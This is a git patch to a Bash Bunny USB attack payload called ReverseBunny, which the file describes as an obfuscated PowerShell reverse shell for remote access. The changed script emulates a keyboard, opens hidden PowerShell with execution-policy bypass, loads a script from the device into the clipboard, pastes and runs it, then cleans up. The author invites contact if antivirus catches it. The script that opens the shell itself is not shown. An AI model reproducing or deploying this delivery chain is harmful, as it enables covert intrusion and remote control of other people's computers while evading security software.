From a74596db962e4ff2514b3145bfd16f125fd61d26 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 1 Oct 2021 11:54:47 +0200 Subject: [PATCH] Update payload.txt Added new "Eject Method" - props to Night(9o3) --- .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++----- 1 file changed, 38 insertions(+), 13 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7f45b871..945fac51 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -1,30 +1,55 @@ +#!/bin/bash +# # Title: ReverseBunny -# Description: Obfuscated reverse shell, executed via powershell +# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.0 -# Category: Execution +# Version: 1.1 +# Category: Remote_Access # Attackmodes: HID, Storage +LED SETUP + GET SWITCH_POSITION -ATTACKMODE HID STORAGE DUCKY_LANG de -#LED RED - DON'T EJECT - PAYLOAD RUNNING +rm /root/udisk/DONE -LED R FAST +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 DELAY 5000 -RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 2000 +RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" +DELAY 6000 -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" -DELAY 5000 +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" +DELAY 10000 Q ENTER -DELAY 5000 +DELAY 10000 Q CONTROL v -DELAY 5000 +DELAY 10000 Q ENTER +DELAY 1000 + +LED STAGE2 + +until [ -f /root/udisk/DONE ] + do + sleep 0.2 +done + +LED CLEANUP + +rm /root/udisk/DONE + +DELAY 100 + +sync + +DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT